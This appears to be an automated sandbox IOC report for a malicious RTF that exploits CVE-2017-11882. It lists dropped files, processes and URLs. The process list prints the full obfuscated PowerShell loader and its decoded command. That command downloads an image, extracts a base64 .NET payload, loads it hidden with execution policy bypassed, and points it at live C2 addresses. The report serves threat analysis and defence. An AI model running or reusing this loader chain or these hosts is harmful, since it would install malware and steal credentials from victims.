IOC Report
SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtf

loading gif

Files

File Path
Type
Category
Malicious
SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtf
Rich Text Format data, version 1
initial sample
 malicious
C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\weneedsmoothbunwithbutterchoco[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{98BA4D31-2A13-4F24-8E9C-AA66DD867138}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{324A8246-326B-4B84-AD8A-3578C7EA4ED3}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5FB8C5D0-63B3-4894-9864-573244E7368D}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\4po4mwsg.pqg.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\bhv25D8.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x03bd051f, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\ex422ksf.oev.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\llbeqoqajhogxgsc
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\loat\logs.dat
data
dropped
C:\Users\user\AppData\Local\Temp\nqrqfhar.5bt.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\z2mfgxo4.v1s.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Wed Aug 28 10:54:51 2024, length=51640, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [folders]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtf
data
dropped
There are 10 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
 malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
 malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBG? ? ? ? ?EM? ? ? ? ?QgBS? ? ? ? ?C8? ? ? ? ?Nw? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?5? ? ? ? ?C4? ? ? ? ?N? ? ? ? ?? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?0? ? ? ? ?Dg? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dc? ? ? ? ?Mw? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\llbeqoqajhogxgsc"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nngwqgjuxpgkhngglvz"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nngwqgjuxpgkhngglvz"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xilprztwtyypjbckdgufzck"
 malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
 malicious
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://ia803104.us.archive.org
unknown
 malicious
http://137.184.234.91/77/RBCF.txt
137.184.234.91
 malicious
45.90.89.98
malicious
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
207.241.232.154
 malicious
http://137.184.234.91/77/weneedsmoothbunwithbutterchoco.tIF
137.184.234.91
 malicious
http://b.scorecardresearch.com/beacon.js
unknown
http://acdn.adnxs.com/ast/ast.js
unknown
http://www.imvu.comr
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
unknown
http://137.184.234.91
unknown
http://ocsp.entrust.net03
unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
unknown
https://contoso.com/License
unknown
https://support.google.com/chrome/?p=plugin_flash
unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
unknown
http://go.micros
unknown
http://www.imvu.com/qK
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://cache.btrll.com/default/Pix-1x1.gif
unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
unknown
https://www.google.com
unknown
http://geoplugin.net/json.gp/C
unknown
http://o.aolcdn.com/ads/adswrappermsni.js
unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
unknown
http://www.msn.com/?ocid=iehp
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
unknown
http://static.chartbeat.com/js/chartbeat.js
unknown
http://www.msn.com/de-de/?ocid=iehp
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
unknown
https://login.yahoo.com/config/login
unknown
http://www.nirsoft.net/
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://ia803104.us.archive.org/27/items/vbs_20240LR
unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
unknown
http://www.nirsoft.net(
unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
unknown
http://geoplugin.net/json.gpb
unknown
http://nuget.org/NuGet.exe
unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey
unknown
http://crl.entrust.net/server1.crl0
unknown
https://contextual.media.net/8/nrrV73987.js
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://contextual.media.net/
unknown
http://137.184.234.91/77/weneedsmoothbunwithbutterchoco.tIFj
unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
unknown
http://geoplugin.net/json.gpy
unknown
http://www.msn.com/
unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
unknown
http://cdn.at.atwola.com/_media/uac/msn.html
unknown
http://go.microsoft.c
unknown
https://www.google.com/accounts/servicelogin
unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
unknown
https://secure.comodo.com/CPS0
unknown
https://policies.yahoo.com/w3c/p3p.xml
unknown
http://137.184.234.91/77/weneedsmoothbunwithbutterchoco.tIFN
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://www.msn.com/advertisement.ad.js
unknown
http://www.ebuddy.com
unknown
There are 66 hidden URLs, click here to show them.

Domains

Name
